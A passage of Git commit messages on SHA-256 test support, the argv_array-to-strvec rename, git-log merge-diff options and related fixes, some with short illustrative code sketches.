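	if (!nr) {
		globs = default_globs;
		nr = 1;
	}
	for (i = 0; i < nr; i++)
		if (!fnmatch(globs[i], branch, 0))
			return true;
	return false;
}
```

Once any pattern is configured, 'master' is no longer special unless it is listed explicitly.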
Add a few tests to protect the behaviour with the new configuration
variable from future regression.
Helped-by: Linus Torvalds <torvalds@linux-foundation.org>
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This reverts commit 489947cee5, which
stopped treating merges into the 'master' branch as special when
preparing the default merge message. As the goal was not to have
any single branch designated as special, it solved it by leaving the
"into <branchname>" at the end of the title of the default merge
message for any and all branches. An obvious and easy alternative
to treat everybody equally could have been to remove it for every
branch, but that involves loss of information.
We'll introduce a new mechanism to let end-users specify merges into
which branches would omit the "into <branchname>" from the title of
the default merge message, and make the mechanism, when unconfigured,
treat the traditional 'master' special again, so all the changes to
the tests we made earlier will become unnecessary, as these tests
will be run without configuring the said new mechanism.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that we call test_oid_init in the setup for all test scripts,
there's no point in calling it individually. Remove all of the places
where we've done so to help keep tests tidy.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that we have Git supporting SHA-256, we'd like to make sure that we
don't regress that state. Unfortunately, it's easy to do so, so to
help, let's add code to run one of our CI jobs with SHA-256 as the
default hash. This will help us detect any problems that may occur.
We pick the linux-clang job because it's relatively fast and the
linux-gcc job already runs the testsuite twice. We want our tests to
run as fast as possible, so we wouldn't want to add a third run to the
linux-gcc job. To make sure we properly exercise the code, let's run
the tests in the default mode (SHA-1) first and then run a second time
with SHA-256. We explicitly specify SHA-1 for the first run so that if
we change the default in the future, we make sure to test both cases.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, the SHA1 prerequisite depends on the output of git
hash-object. However, in order for that to produce sane behavior, we
must be in a repository. If we are not, the default will remain SHA-1,
and we'll produce wrong results if we're using SHA-256 for the testsuite
but the test assertion starts when we're not in a repository.
Check the environment variable we use for this purpose, leaving it to
default to SHA-1 if none is specified.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To allow developers to run the testsuite with a different algorithm than
the default, provide an environment variable, GIT_TEST_DEFAULT_HASH, to
specify the algorithm to use. Compute the fixed constants using
test_oid. Move the constant initialization down below the point where
test-lib-functions.sh is loaded so the functions are defined.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In some tests, we have data files which are written with a particular
hash algorithm. Instead of keeping two copies of the test files, we can
keep one, and translate the value on the fly.
In order to do so, we'll need to read both the source algorithm and the
current algorithm, so add an optional flag to the test_oid helper that
lets us look up a value for a specified hash algorithm. This should
not cause any conflicts with existing tests, since key arguments to
test_oid are allowed to contain only shell identifier characters.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that we have a complete SHA-256 implementation in Git, let's enable
it so people can use it. Remove the ENABLE_SHA256 define constant
everywhere it's used. Add tests for initializing a repository with
SHA-256.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The transition plan specifies extensions.objectFormat as the indication
that we're using a given hash in a certain repo. Read this as one of
the extensions we support. If the user has specified an invalid value,
fail.
Ensure that we reject the extension if the repository format version is
0.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently we detect the hash algorithm in use by the length of the
object ID. This is inelegant and prevents us from using a different
hash algorithm that is also 256 bits in length.
Since we cannot extend the v2 format in a backward-compatible way, let's
add a v3 format, which is identical, except for the addition of
capabilities, which are prefixed by an at sign. We add "object-format"
as the only capability and reject unknown capabilities, since we do not
have a network connection and therefore cannot negotiate with the other
side.
For compatibility, default to the v2 format for SHA-1 and require v3
for SHA-256.
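A reader that accepts only the "object-format" capability and rejects everything else might look like the sketch below. The "@object-format=<name>" spelling of the line, the enum, and the function name are assumptions made for this example; the text above only states that capabilities are prefixed by an at sign.

```c
#include <assert.h>
#include <string.h>

enum hash_algo { HASH_UNKNOWN = 0, HASH_SHA1, HASH_SHA256 };

/*
 * Parse one capability line (without its trailing newline), for
 * example "@object-format=sha256". Return 0 and set *algo on
 * success; return -1 for an unknown capability or an unknown value,
 * since there is no peer to negotiate with.
 */
static int parse_capability(const char *line, enum hash_algo *algo)
{
	static const char key[] = "@object-format=";
	const char *value;

	assert(line && algo);
	if (strncmp(line, key, sizeof(key) - 1))
		return -1;
	value = line + sizeof(key) - 1;
	if (!strcmp(value, "sha1"))
		*algo = HASH_SHA1;
	else if (!strcmp(value, "sha256"))
		*algo = HASH_SHA256;
	else
		return -1;
	return 0;
}
```

Naming the algorithm explicitly is what allows a future hash of the same length to be told apart, which a length check alone cannot do.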
In t5510, always use format v3 so we can be sure we produce consistent
results across hash algorithms. Since head -n N lists the top N lines
instead of the Nth line, let's run our output through sed to normalize
it and compare it against a fixed value, which will make sure we get
exactly what we're expecting.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A recently added test in t5702 started using git verify-pack outside of
a repository. While this poses no problems with SHA-1, with SHA-256 we
implicitly rely on the setup of the repository to initialize our hash
algorithm settings.
Since we're not in a repository here, we need to provide git verify-pack
help to set things up properly. git index-pack already knows an
--object-format option, so let's accept one as well and pass it down to
our git index-pack invocation. Since we're now dynamically adjusting
the elements in argv, let's switch to using struct argv_array to manage
them. Finally, let's make t5702 pass the proper argument on down to its
git verify-pack caller.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In dd4b732df7 ("upload-pack: send part of packfile response as uri",
2020-06-10), the git http-fetch code learned how to take a --packfile
option. This option takes an argument, which is the name of a packfile
hash, and parses it using parse_oid_hex. It does so before calling
setup_git_directory.
However, in a SHA-256 repository this fails to work, since we have not
set the hash algorithm in use and parse_oid_hex fails as a consequence.
To ensure that we can parse packfile hashes of the right length, let's
set up the git directory before we start parsing arguments.
Since we still want to allow the invocation of -h to print the help when
we're not in a repository, gracefully handle us being outside of one and
produce an error after argument parsing has finished.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
These tests try to check that we behave properly if we encounter a
repository with version 0 but an extension. This is a laudable goal,
but the test cannot work with SHA-256, since SHA-256 repositories always
have an existing extension and are never version 0.
Add a SHA1 prerequisite to these tests.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This test needs multiple object IDs that have the same first byte.
Update the pack test code to generate a suitable packed value for
SHA-256. Update the test to use this value when using SHA-256.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The Perl test script for t9700 was matching on exactly 40 hex
characters. With SHA-256, we'll have 64 hex-character object IDs.
Create a variable with a regex which matches exactly 40 or 64 hex
characters and use that to match the output. Note that both of the uses
of this can be anchored, which makes the code simpler, so do that as
well.
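For illustration, the same idea expressed in Python rather than the Perl used by t9700 (the names `OID_RE` and `is_full_oid` are made up for this sketch):

```python
import re

# 40 hex digits for SHA-1, 64 for SHA-256; fullmatch() anchors both ends,
# so nothing may precede or follow the object ID.
OID_RE = re.compile(r"[0-9a-f]{40}|[0-9a-f]{64}")


def is_full_oid(text):
    """Return True if text is exactly one full-length hex object ID."""
    return OID_RE.fullmatch(text) is not None
```

Anchoring is what keeps a 41-character string from being accepted on the strength of its first 40 characters.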
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we use a hash algorithm other than SHA-1, it's important to
preserve the hash-related values in the config file, but this test
overwrites the config file with a new one. Ensure we copy these values
properly from the old config to the new one so that the repository can
be read if it's using SHA-256.
Note that if there is no extensions.objectFormat value set, git config
will return unsuccessfully if we try to read it; since this is not an
error for us, use test_might_fail.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This test checks for several commit object sizes to verify that objects
are encoded as expected. However, the size of a commit object differs
between SHA-1 and SHA-256, since each contains a hex representation of
the tree's object ID. Since these are root commits, compute the size of
each commit by using a constant plus the size of a single hex object ID.
In addition, use $ZERO_OID instead of a hard-coded object ID.
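The "constant plus one hex object ID" arithmetic can be sketched as follows. This is only an illustration in Python, not the shell used by the test; the identity string and the commit message are invented placeholders.

```python
# Hypothetical identity line; any fixed string works for the illustration.
IDENT = "A U Thor <author@example.com> 1112911993 -0700"


def root_commit_payload(tree_hex, message="initial\n"):
    """Build the payload of a parentless commit for the given tree ID."""
    return (
        f"tree {tree_hex}\n"
        f"author {IDENT}\n"
        f"committer {IDENT}\n"
        "\n"
        f"{message}"
    ).encode()


def root_commit_size(hexsz):
    """Size in bytes of a root commit whose tree ID has hexsz hex digits."""
    return len(root_commit_payload("0" * hexsz))


# The part that does not depend on the hash is the same for both algorithms.
constant = root_commit_size(40) - 40
```

Because a root commit has no "parent" lines, the tree line is the only place an object ID appears, so the sizes for SHA-1 and SHA-256 differ by exactly 64 - 40 = 24 bytes.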
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of using a hard-coded all-zeros object ID, use $ZERO_OID.
Compute the length of the object IDs in use and use this instead of
hard-coding the constant 40.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Adjust the test so that it computes variables for object IDs instead of
using hard-coded hashes. In addition, use cut to filter out the object
IDs and verify only the information that we're really interested in.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Allow lines which start with either a 40- or 64-character hex object ID,
to allow for both SHA-1 and SHA-256.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
One assertion in this test invokes git with core.abbrev set to "40".
Since we're expecting the full hash length, use test_oid to look up the
full hash length for the hash in use.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use the ZERO_OID variable to abbreviate the all-zeros object ID for
maintainability and to avoid depending on a specific size for the hash.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Adjust the test to sanitize the diffs and strip out object IDs from
them, as it does for other object IDs, since we are not interested in
the particular values used.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of using cut with hard-coded hash sizes, use cut with fields, or
where that's not possible, sed with $OID_REGEX, so that the tests are
independent of hash size.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This test contains hard-coded invalid object IDs. Make it hash size
independent by generating invalid object IDs using the translation
tables. Add a setup target to ensure the output of test_oid_init is
checked properly.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In this test, we want to produce several blobs whose first two hex
characters are "17", since we look at this object directory as a proxy
for how many loose objects there are before we need to GC. Use
test_oid_cache to specify strings that will hash to the right values
when turned into blobs.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of hard-coding a fixed length example object ID in the test,
compute one using the translation tables. Move a variable into the
setup block so that we can ensure the exit status of test_oid is
checked.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The idea of the magic value "ac4f2ee" in this test is to make the
reworded commit `collide2` have the same shortened ID as the commit
`collide3`.
To port the same idea to the SHA-256 version of Git, we therefore need
another magic value that causes the same collision, but this time with
the SHA-256 version of the commit IDs.
In this patch, we add code guarded by `GIT_TEST_FIND_COLLIDER` to do
exactly that. Essentially, a large number of integers is appended to the
commit message "collide2" to find such a collision. To make it easier to
find such a collision, we reduce the number of digits to 4.
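The search can be pictured with the Python sketch below. It is a stand-in, not the code guarded by `GIT_TEST_FIND_COLLIDER`: it hashes blobs instead of commits to stay self-contained, and `git_object_id` and `find_collider` are hypothetical names.

```python
import hashlib
from itertools import count


def git_object_id(kind, payload, algo="sha256"):
    """Hash an object the way Git does: "<type> <size>\\0" plus the payload."""
    header = f"{kind} {len(payload)}".encode() + b"\0"
    return hashlib.new(algo, header + payload).hexdigest()


def find_collider(base, target_prefix, algo="sha256"):
    """Append 0, 1, 2, ... to base until the ID starts with target_prefix."""
    for n in count():
        candidate = f"{base}{n}\n".encode()
        if git_object_id("blob", candidate, algo).startswith(target_prefix):
            return n
```

With a 4-digit prefix there are 16^4 = 65536 possible values, so a match is expected after roughly that many attempts, which is why shortening the abbreviation makes the search cheap.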
As the tests are no longer dependent on SHA-1, we also rename their
titles to talk about "commit IDs" instead of "SHA-1s".
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When computing the fanout length, let's use test_oid to look up the
hexadecimal size of the hash in question instead of hard-coding a value.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The bloom filter code relies on reading object IDs using parse_oid_hex.
In order to make that work with an appropriate size, we need to have
initialized the repository's hash algorithm. Since the values we're
processing depend on the repository in use, let's set up the repository
when we run the test helper.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The merge tools vimdiff2, vimdiff3, gvimdiff2, gvimdiff3 and bc3 are all
variants of the main tools vimdiff and bc. They are implemented in the
main tool's script, and a one-liner script that just sources it exists for each.
Allow variants ending in [0-9] to be correctly wired without the need
for such one-liners, so instead of 5 scripts, only 1 (gvimdiff) is
needed.
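A minimal sketch of the lookup rule, in Python rather than the shell of the mergetool library; `resolve_tool_script` and the set of available scripts are assumptions made for the example:

```python
def resolve_tool_script(tool, available):
    """Pick the script that implements tool, or None if there is none."""
    if tool in available:
        return tool
    # A variant such as "vimdiff3" falls back to the script of "vimdiff".
    if tool and tool[-1] in "0123456789":
        base = tool[:-1]
        if base in available:
            return base
    return None


# Hypothetical set of scripts left after dropping the one-liners.
SCRIPTS = {"vimdiff", "gvimdiff", "bc"}
```

Only one trailing digit is stripped, which is enough for names like "bc3" and "gvimdiff2" without accidentally matching unrelated tools.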
Signed-off-by: pudinha <rogi@skylittlesystem.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It can be surprising that git-log doesn't show any diff for merge
commits by default. Arguably "--cc" would be a reasonable default, but
it's very expensive (which is why we turn it on for "git show" but not
for "git log"). Let's at least document the current behavior, including
the recent "--first-parent implies -m" case.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "-t" option is infrequently used; it doesn't deserve a spot near the
top of the options list. Let's push it down into the diff-options
include, near the definition of --raw.
We'll protect it with a git-log ifdef, since it doesn't make any sense
for non-tree diff commands. Note that this means it also shows up in
git-show, but that's a good thing; it applies equally well there.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This has been the default since 170c04383b (Porcelain level "log" family
should recurse when diffing., 2007-08-27). There's not even a way to
turn it off, so you'd never even want "-r" to override that.
It's not the default for plumbing like diff-tree, of course, but the
option is documented separately there.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our rev-list-options.txt include has a "Diff Formatting" section, but it
is ifndef'd out for all manpages except git-log. And a few bits of the
text are rather out of date.
We say "some of these options are specific to git-rev-list". That's
obviously silly since we (even before this patch) show the content only
for git-log. But moreover, it's not true; each of the listed options is
meaningful for other diff commands.
We also say "...however other diff options may be given. See git-diff-files
for more options." But there's no need to do so; git-log already has a
"Common Diff Options" section which includes diff-options.txt.
So let's move these options over to git-log and put them with the other
diff options, giving a single "diff" section for the git-log
documentation. We'll call it "Diff Formatting" but use the all-caps
top-level header to match its sibling sections. And we'll rewrite the
section intro to remove the useless bits and give a more generic
overview of the section which can be later extended.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When using "--first-parent" to consider history as a single line of
commits, git-log still defaults to treating merges specially, even
though they could be considered as single commits in the linearized
history (that just introduce all of the changes from the second and
higher parents).
Let's instead have "--first-parent" imply "-m", which makes something
like:
git log --first-parent -p
do what you'd expect. Likewise:
git log --first-parent -Sfoo
will find "foo" in merge commits.
No new test is needed; we'll tweak the output of the existing
"--first-parent -p" test, which now matches the "-m --first-parent -p"
test. The unchanged existing test for "--no-diff-merges" confirms that
the user can get the old behavior if they want.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "-m" option sets revs->ignore_merges to "0", but there's no way to
undo it. This probably isn't something anybody overly cares about, since
"1" is already the default, but it will serve as an escape hatch when we
flip the default for ignore_merges to "0" in more situations.
We'll also add a few extra niceties:
- initialize the value to "-1" to indicate "not set", and then resolve
it to the normal 0/1 bool in setup_revisions(). This lets any tweak
functions, as well as setup_revisions() itself, avoid clobbering the
user's preference (which until now they couldn't actually express).
- since we now have --no-diff-merges, let's add the matching
--diff-merges, which is just a synonym for "-m". Then we don't even
need to document --no-diff-merges separately; it countermands the
long form of "-m" in the usual way.
The new test shows that this behaves just the same as the current
behavior without "-m".
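The "-1 means not set" scheme can be sketched like this. It is a Python model of the idea only; `resolve_ignore_merges` and its `default` parameter are hypothetical and do not mirror the layout of setup_revisions().

```python
def resolve_ignore_merges(args, default=1):
    """Return the final 0/1 value of ignore_merges for the given options."""
    ignore_merges = -1  # -1 means "the user has not said anything"
    for arg in args:
        if arg in ("-m", "--diff-merges"):
            ignore_merges = 0
        elif arg == "--no-diff-merges":
            ignore_merges = 1
    if ignore_merges < 0:
        # Only fill in a default when no explicit preference was given.
        ignore_merges = default
    return ignore_merges
```

Because the default is applied last and only to the "not set" state, a caller can change `default` without ever overriding an explicit "--no-diff-merges".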
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This was added by 82dee4160c (log: show merge commit when --cc is given,
2015-08-20), which explains why we need it. But that commit failed to
notice that setup_revisions() already does the same thing, since
cd2bdc5309 (Common option parsing for "git log --diff" and friends,
2006-04-14).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This commit fixes a couple of minor spelling mistakes inside
comments.
Signed-off-by: Steve Kemp <steve@steve.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix typos introduced in commit a133737b80 ("doc: include --guide option
description for "git help"", 2013-04-02).
Signed-off-by: Andrei Rybak <rybak.a.v@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
parse_object_or_die() is passed an object ID and a name to show if the
object cannot be parsed. If the name is NULL then it shows the
hexadecimal object ID. Use that feature instead of preparing and
passing the hexadecimal representation to the function proactively.
That's shorter and a bit more efficient.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There are no callers which need it anymore. Any topics in flight will
need to be updated as they get merged in (but the compiler will make
that quite clear).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There were a few mentions of argv_array in a non-code file which didn't
get picked up in the previous commits (note that even comments in code
files were already covered because of the mechanical conversion via
perl).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Code which split an argv_array call across multiple lines, like:
    argv_array_pushl(&args, "one argument",
                     "another argument", "and more",
                     NULL);
was recently mechanically renamed to use strvec, which results in
mis-matched indentation like:
    strvec_pushl(&args, "one argument",
                     "another argument", "and more",
                     NULL);
Let's fix these up to align the arguments with the opening paren. I did
this manually by sifting through the results of:
git jump grep 'strvec_.*,$'
and liberally applying my editor's auto-format. Most of the changes are
of the form shown above, though I also normalized a few that had
originally used a single-tab indentation (rather than our usual style of
aligning with the open paren). I also rewrapped a couple of obvious
cases (e.g., where previously too-long lines became short enough to fit
on one), but I wasn't aggressive about it. In cases broken to three or
more lines, the grouping of arguments is sometimes meaningful, and it
wasn't worth my time or reviewer time to ponder each case individually.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We eventually want to drop the argv_array name and just use strvec
consistently. There's no particular reason we have to do it all at once,
or care about interactions between converted and unconverted bits.
Because of our preprocessor compat layer, the names are interchangeable
to the compiler (so even a definition and declaration using different
names is OK).
This patch converts all of the remaining files, as the resulting diff is
reasonably sized.
The conversion was done purely mechanically with:
git ls-files '*.c' '*.h' |
xargs perl -i -pe '
s/ARGV_ARRAY/STRVEC/g;
s/argv_array/strvec/g;
'
We'll deal with any indentation/style fallouts separately.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We eventually want to drop the argv_array name and just use strvec
consistently. There's no particular reason we have to do it all at once,
or care about interactions between converted and unconverted bits.
Because of our preprocessor compat layer, the names are interchangeable
to the compiler (so even a definition and declaration using different
names is OK).
This patch converts remaining files from the first half of the alphabet,
to keep the diff to a manageable size.
The conversion was done purely mechanically with:
git ls-files '*.c' '*.h' |
xargs perl -i -pe '
s/ARGV_ARRAY/STRVEC/g;
s/argv_array/strvec/g;
'
and then selectively staging files with "git add '[abcdefghjkl]*'".
We'll deal with any indentation/style fallouts separately.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We eventually want to drop the argv_array name and just use strvec
consistently. There's no particular reason we have to do it all at once,
or care about interactions between converted and unconverted bits.
Because of our preprocessor compat layer, the names are interchangeable
to the compiler (so even a definition and declaration using different
names is OK).
This patch converts all of the files in builtin/ to keep the diff to a
manageable size.
The conversion was done purely mechanically with:
git ls-files '*.c' '*.h' |
xargs perl -i -pe '
s/ARGV_ARRAY/STRVEC/g;
s/argv_array/strvec/g;
'
and then selectively staging files with "git add builtin/". We'll deal
with any indentation/style fallouts separately.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We want to eventually drop the use of the "argv_array" name in favor of
"strvec." Unlike most other uses of the name, this one is embedded in a
function name, so the definition and all of the callers need to be
updated at the same time.
We don't technically need to update the parameter types here (our
preprocessor compat macros make the two names interchangeable), but
let's do so to keep the site consistent for now.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This requires updating #include lines across the code-base, but that's
all fairly mechanical, and was done with:
git ls-files '*.c' '*.h' |
xargs perl -i -pe 's/argv-array.h/strvec.h/'
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The name "argv-array" isn't very good, because it describes what the
data type can be used for (program argument arrays), not what it
actually is (a dynamically-growing string array that maintains a
NULL-terminator invariant). This leads to people being hesitant to use
it for other cases where it would actually be a good fit. The existing
name is also clunky to use. It's overly long, and the name often leads
to saying things like "argv.argv" (i.e., the field names overlap with
variable names, since they're describing the use, not the type). Let's
give it a more neutral name.
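To make the "what it actually is" part concrete, here is a toy Python model of a growable string array that keeps a terminator in place at all times. It is only an analogy for the C structure: the class and its `items` and `count` names are invented, and `None` stands in for the NULL pointer.

```python
class StrVec:
    """Toy model of a growable string array that always ends in None."""

    def __init__(self):
        self.items = [None]  # the terminator is present even when empty

    @property
    def count(self):
        """Number of strings stored, not counting the terminator."""
        return len(self.items) - 1

    def push(self, value):
        """Append one string, keeping the terminator in the last slot."""
        self.items[-1] = value
        self.items.append(None)
        return value

    def pushl(self, *values):
        """Append several strings in order."""
        for value in values:
            self.push(value)

    def clear(self):
        """Drop all strings and return to the empty, terminated state."""
        self.items = [None]
```

Nothing in the model is specific to command-line arguments, which is the point of the rename: the same container fits any list of strings that some consumer expects to be terminated.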
I settled on "strvec" because "vector" is the name for a dynamic array
type in many programming languages. "strarray" would work, too, but it's
longer and a bit more awkward to say (and don't we all say these things
in our mind as we type them?).
A more extreme direction would be a generic data structure which stores
a NULL-terminated array of _any_ type. That would be easy to do with void
pointers, but we'd lose some type safety for the existing cases. Plus it
raises questions about memory allocation and ownership. So I limited
myself here to changing names only, and not semantics. If we do find a
use for that more generic data type, we could perhaps implement it at a
lower level and then provide type-safe wrappers around it for strings.
But that can come later.
This patch does the minimum to convert the struct and function names in
the header and implementation, leaving a few things for follow-on
patches:
- files retain their original names for now
- struct field names are retained for now
- there's a preprocessor compat layer that lets most users remain the
same for now. The exception is headers which made a manual forward
declaration of the struct. I've converted them (and their dependent
function declarations) here.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
On most 64-bit platforms, "int" is significantly smaller than a size_t,
which could lead to integer overflow and under-allocation of the array.
It's probably impossible to trigger in practice, as it would imply on
the order of 2^32 individual allocations. Even if it was possible to grow
an array in that way (and we typically only use it for sets of strings,
like command line options), each allocation needs a pointer, malloc
overhead, etc. You'd quite likely run out of RAM before succeeding in
such an overflow.
But all that hand-waving aside, it's easy enough to use the correct
type, so let's do so.
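The arithmetic behind the concern can be modelled in Python. This sketch assumes a 32-bit "int" and 8-byte pointers; note that signed overflow is undefined behavior in C, and the wrap-around shown here is just one common outcome. The helper names are made up.

```python
INT_MAX = 2**31 - 1
POINTER_SIZE = 8  # assumed size of a pointer on a 64-bit platform


def as_int32(value):
    """Wrap a Python integer the way a 32-bit two's complement int would."""
    return (value + 2**31) % 2**32 - 2**31


def bytes_needed(count):
    """Room for `count` string pointers plus the NULL terminator."""
    return (count + 1) * POINTER_SIZE


# A counter kept in an "int" goes negative one step past INT_MAX ...
wrapped = as_int32(INT_MAX + 1)
# ... while a 64-bit size_t would still hold the true count.
true_size = bytes_needed(INT_MAX + 1)
```

Any allocation size derived from the wrapped counter would have little to do with the number of entries actually stored, which is the under-allocation the message refers to.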
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is consistent with the definition of REF_TYPE_PSEUDOREF
(uppercase in the root ref namespace).
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous behavior was introduced in commit 74ec19d4be
("pseudorefs: create and use pseudoref update and delete functions",
Jul 31, 2015), with the justification "alternate ref backends still
need to store pseudorefs in GIT_DIR".
Refs such as REBASE_HEAD are read through the ref backend. This can
only work consistently if they are written through the ref backend as
well. Tooling that works directly on files under .git should be
updated to use git commands to read refs instead.
The following behaviors change:
* Updates to pseudorefs (e.g. ORIG_HEAD) with
core.logAllRefUpdates=always will create reflogs for the pseudoref.
* non-HEAD pseudoref symrefs are also dereferenced on deletion. Update
t1405 accordingly.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
I've seen several people mis-configure git send-email on their first
attempt because they set the sendmail.* config options - not
sendemail.*. This patch detects this mistake and bails out with a
friendly warning.
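The check amounts to looking for keys in the wrong section. A minimal sketch in Python (the real script is Perl; `misnamed_sendmail_keys` is a hypothetical helper and the keys are example data):

```python
def misnamed_sendmail_keys(config_keys):
    """Return the keys that sit under sendmail.* instead of sendemail.*."""
    # Section names are compared case-insensitively.
    return sorted(k for k in config_keys if k.lower().startswith("sendmail."))


keys = ["sendemail.smtpserver", "sendmail.smtpserver", "user.name"]
```

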